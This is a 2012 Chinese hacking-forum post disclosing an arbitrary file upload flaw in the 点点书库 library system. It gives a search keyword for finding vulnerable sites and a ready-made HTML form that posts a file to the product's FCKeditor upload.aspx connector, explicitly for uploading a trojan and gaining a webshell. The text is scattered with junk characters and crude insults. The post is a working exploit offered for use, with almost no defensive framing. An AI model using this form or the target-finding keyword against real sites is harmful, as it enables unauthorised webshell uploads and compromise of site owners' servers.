找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7441|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞; c( `( l" P, G# R" }: [0 v
作者:冰锋刺客% s2 W/ {2 y6 B3 [- ~+ D  `
厂商:点击书(dianjishu.com)
8 l3 ]+ I7 c( g 日期:2012-6-21$ P! m4 v7 K* l/ f
% A; G! O  q8 \$ X
I 概述, s$ W8 U! Y4 O6 v2 Y
   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell8 O4 K& u$ d! q  M2 d+ ^
II 简介, N% R2 \# b/ P) T4 C/ H& i+ |$ m
   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
0 `  M( L: H1 ]8 }" A7 o 补充一个漏洞
  K2 j5 i1 B2 h& S6 b- T; A <form id="frmUpload" enctype="multipart/form-data"  K/ _5 @- R' X7 g9 Z/ ?  n6 |
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>8 A1 V' U, _3 ~
<input id="btnUpload" type="submit" value="操翻他">
- M& R7 S7 C2 i1 @( Y: {; K </form>6 v3 `& N7 j. M( \7 D4 N3 a
你们懂的
5 D- y7 P, H0 X' w/ a 那傻逼提供还需要改包.( U, e' |' y5 F5 D: n
自己看了下源代码发现fckeditor
8 S9 v: @9 T0 |  k% ^ 直接秒杀. E/ W# C7 X" U1 m1 d- b8 C+ k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表